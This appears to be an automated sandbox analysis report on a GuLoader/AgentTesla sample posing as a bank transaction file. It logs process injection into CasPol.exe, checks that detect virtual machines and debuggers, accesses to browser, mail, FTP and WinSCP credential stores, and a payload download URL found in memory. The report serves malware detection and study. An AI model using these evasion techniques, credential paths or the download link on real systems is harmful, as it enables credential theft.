            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:304:WilStaging_02
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2412:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 0000000B.00000000.329673621404.0000000000BC0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.329868071073.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeCode function: 2_2_00406A78 push ebp; ret
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeCode function: 2_2_004081F5 push eax; ret
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeCode function: 2_2_02B7193C push ds; iretd
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeCode function: 2_2_02B73576 push cs; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDEFE push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF2E push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF2A push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF26 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF22 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF1E push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF1A push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF16 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF12 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF0E push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF0A push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF06 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00BCDF02 push es; iretd
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00F83184 pushfd ; retf
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00FC2177 push edi; retn 0000h
            Source: initial sampleStatic PE information: section name: .text entropy: 6.98717798783
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            barindex
            Tries to detect Any.runShow sources
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeFile opened: C:\Program Files\qga\qga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Program Files\qga\qga.exe
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=WINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLLWINDIR=\MICROSOFT.NET\FRAMEWORK\V4.0.30319\CASPOL.EXE\SYSWOW64\MSVBVM60.DLL
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmpBinary or memory string: CROGRAM FILES\QEMU-GA\QEMU-GA.EXE
            Source: CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32APPDATA=HTTPS://DRIVE.GOOGLE.COM/UC?EXPORT=DOWNLOAD&ID=1BYST7N55Z6CYOUJFQB0EF6QJVN6HNYWC
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmpBinary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEPEB
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe TID: 644Thread sleep time: -2767011611056431s >= -30000s
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindow / User API: threadDelayed 9943
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess information queried: ProcessInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeSystem information queried: ModuleInformation
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmpBinary or memory string: crogram Files\Qemu-ga\qemu-ga.exe
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
            Source: CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: vmicshutdown
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Time Synchronization Service
            Source: CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: vmicvss
            Source: CasPol.exe, 0000000B.00000002.334286652659.0000000000DC9000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000002.334286203307.0000000000D6B000.00000004.00000020.sdmp, CasPol.exe, 0000000B.00000003.330770055666.0000000000DC9000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Data Exchange Service
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Heartbeat Service
            Source: CasPol.exe, 0000000B.00000002.334286042275.0000000000CD0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=https://drive.google.com/uc?export=download&id=1byST7n55z6cYoUjFqb0Ef6QjVn6HNywC
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869552220.0000000004D09000.00000004.00000001.sdmp, CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: Hyper-V Guest Service Interface
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329869473131.0000000004C40000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32APPDATA=windir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dllwindir=\Microsoft.NET\Framework\v4.0.30319\caspol.exe\syswow64\msvbvm60.dll
            Source: CasPol.exe, 0000000B.00000002.334289516739.0000000002B79000.00000004.00000001.sdmpBinary or memory string: vmicheartbeat
            Source: PKO_TRANS_DETAILS_20211216_0809521.exe, 00000002.00000002.329867160376.0000000000623000.00000004.00000020.sdmpBinary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exePEb

            Anti Debugging:

            barindex
            Hides threads from debuggersShow sources
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeThread information set: HideFromDebugger
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_00AD6950 LdrInitializeThunk,
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: BC0000
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\PKO_TRANS_DETAILS_20211216_0809521.exe"
            Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmpBinary or memory string: Program Manager
            Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
            Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmpBinary or memory string: Progman
            Source: CasPol.exe, 0000000B.00000002.334289071436.0000000001720000.00000002.00020000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4076, type: MEMORYSTR
            GuLoader behavior detectedShow sources
            Source: Initial fileSignature Results: GuLoader behavior
            Tries to steal Mail credentials (via file / registry access)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Tries to harvest and steal ftp login credentialsShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
            Tries to harvest and steal browser information (history, passwords, etc)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\cookies.sqlite
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: Yara matchFile source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4076, type: MEMORYSTR

            Remote Access Functionality:

            barindex
            Yara detected AgentTeslaShow sources
            Source: Yara matchFile source: 0000000B.00000002.334298128627.000000001DD01000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 4076, type: MEMORYSTR

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
